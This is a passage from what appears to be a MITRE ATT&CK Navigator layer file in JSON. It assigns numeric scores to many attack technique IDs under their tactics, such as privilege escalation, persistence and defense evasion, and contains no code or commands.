"tactic": "execution",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1056.002",
"tactic": "collection",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1056.002",
"tactic": "credential-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.001",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.001",
"tactic": "persistence",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.001",
"tactic": "privilege-escalation",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.001",
"tactic": "initial-access",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036.006",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1137.002",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1204.002",
"tactic": "execution",
"score": 36,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1553",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.007",
"tactic": "execution",
"score": 22,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1071",
"tactic": "command-and-control",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1553.001",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1586.003",
"tactic": "resource-development",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1590",
"tactic": "reconnaissance",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1197",
"tactic": "defense-evasion",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1197",
"tactic": "persistence",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1102.001",
"tactic": "command-and-control",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1102.003",
"tactic": "command-and-control",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1568",
"tactic": "command-and-control",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1595",
"tactic": "reconnaissance",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1567.002",
"tactic": "exfiltration",
"score": 13,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1056",
"tactic": "collection",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1056",
"tactic": "credential-access",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1221",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1499.004",
"tactic": "impact",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1210",
"tactic": "lateral-movement",
"score": 15,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1127",
"tactic": "defense-evasion",
"score": 20,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.001",
"tactic": "defense-evasion",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.001",
"tactic": "privilege-escalation",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.011",
"tactic": "defense-evasion",
"score": 43,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055",
"tactic": "defense-evasion",
"score": 33,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055",
"tactic": "privilege-escalation",
"score": 33,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.003",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.003",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.012",
"tactic": "defense-evasion",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.012",
"tactic": "privilege-escalation",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.005",
"tactic": "execution",
"score": 26,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.005",
"tactic": "defense-evasion",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1555.005",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1195.002",
"tactic": "initial-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1482",
"tactic": "discovery",
"score": 17,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1090.003",
"tactic": "command-and-control",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1559.001",
"tactic": "execution",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.010",
"tactic": "defense-evasion",
"score": 19,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1003.005",
"tactic": "credential-access",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.001",
"tactic": "defense-evasion",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.001",
"tactic": "privilege-escalation",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.003",
"tactic": "privilege-escalation",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.003",
"tactic": "persistence",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550.003",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550.003",
"tactic": "lateral-movement",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.003",
"tactic": "defense-evasion",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1127.001",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.009",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021.006",
"tactic": "lateral-movement",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1090.002",
"tactic": "command-and-control",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.002",
"tactic": "defense-evasion",
"score": 26,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.011",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.011",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548.002",
"tactic": "privilege-escalation",
"score": 56,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548.002",
"tactic": "defense-evasion",
"score": 56,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543",
"tactic": "persistence",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543",
"tactic": "privilege-escalation",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1599.001",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.014",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1220",
"tactic": "defense-evasion",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.007",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.007",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.007",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027.002",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1202",
"tactic": "defense-evasion",
"score": 39,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1129",
"tactic": "execution",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1518",
"tactic": "discovery",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1588.002",
"tactic": "resource-development",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070.001",
"tactic": "defense-evasion",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.001",
"tactic": "defense-evasion",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.002",
"tactic": "privilege-escalation",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.002",
"tactic": "persistence",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1587.001",
"tactic": "resource-development",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1074.001",
"tactic": "collection",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027.004",
"tactic": "defense-evasion",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.011",
"tactic": "persistence",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.011",
"tactic": "privilege-escalation",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.011",
"tactic": "defense-evasion",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1012",
"tactic": "discovery",
"score": 14,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.008",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.008",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.008",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027.009",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1087.002",
"tactic": "discovery",
"score": 21,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1090.001",
"tactic": "command-and-control",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1216",
"tactic": "defense-evasion",
"score": 13,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1615",
"tactic": "discovery",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.011",
"tactic": "privilege-escalation",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.011",
"tactic": "persistence",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1552.002",
"tactic": "credential-access",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1072",
"tactic": "execution",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1072",
"tactic": "lateral-movement",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.008",
"tactic": "defense-evasion",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1048.001",
"tactic": "exfiltration",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1132.001",
"tactic": "command-and-control",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.001",
"tactic": "persistence",
"score": 39,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.001",
"tactic": "privilege-escalation",
"score": 39,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1505.005",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556.002",
"tactic": "credential-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556.002",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556.002",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.008",
"tactic": "privilege-escalation",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.008",
"tactic": "persistence",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.007",
"tactic": "privilege-escalation",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.007",
"tactic": "persistence",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.014",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.014",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.010",
"tactic": "persistence",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.010",
"tactic": "privilege-escalation",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.002",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.002",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1564.006",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1069.002",
"tactic": "discovery",
"score": 15,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.005",
"tactic": "execution",
"score": 51,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.005",
"tactic": "persistence",
"score": 51,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.005",
"tactic": "privilege-escalation",
"score": 51,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027.005",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.002",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546",
"tactic": "privilege-escalation",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546",
"tactic": "persistence",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1204.004",
"tactic": "execution",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027.010",
"tactic": "defense-evasion",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.010",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.002",
"tactic": "defense-evasion",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.002",
"tactic": "privilege-escalation",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1219",
"tactic": "command-and-control",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.013",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1564.003",
"tactic": "defense-evasion",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1555.003",
"tactic": "credential-access",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547",
"tactic": "persistence",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547",
"tactic": "privilege-escalation",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218.007",
"tactic": "defense-evasion",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.005",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.005",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.005",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1491.001",
"tactic": "impact",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.001",
"tactic": "privilege-escalation",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.001",
"tactic": "persistence",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1608",
"tactic": "resource-development",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1539",
"tactic": "credential-access",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1211",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1563.002",
"tactic": "lateral-movement",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1552.006",
"tactic": "credential-access",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1560",
"tactic": "collection",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1505.002",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1542.001",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1542.001",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1176.001",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1649",
"tactic": "credential-access",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1555.004",
"tactic": "credential-access",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1553.005",
"tactic": "defense-evasion",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1569",
"tactic": "execution",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1120",
"tactic": "discovery",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1542.003",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1542.003",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1614.001",
"tactic": "discovery",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1484.001",
"tactic": "defense-evasion",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1484.001",
"tactic": "privilege-escalation",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021.005",
"tactic": "lateral-movement",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1119",
"tactic": "collection",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1590.001",
"tactic": "reconnaissance",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.015",
"tactic": "privilege-escalation",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.015",
"tactic": "persistence",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.003",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.003",
"tactic": "privilege-escalation",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574",
"tactic": "persistence",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574",
"tactic": "privilege-escalation",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574",
"tactic": "defense-evasion",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
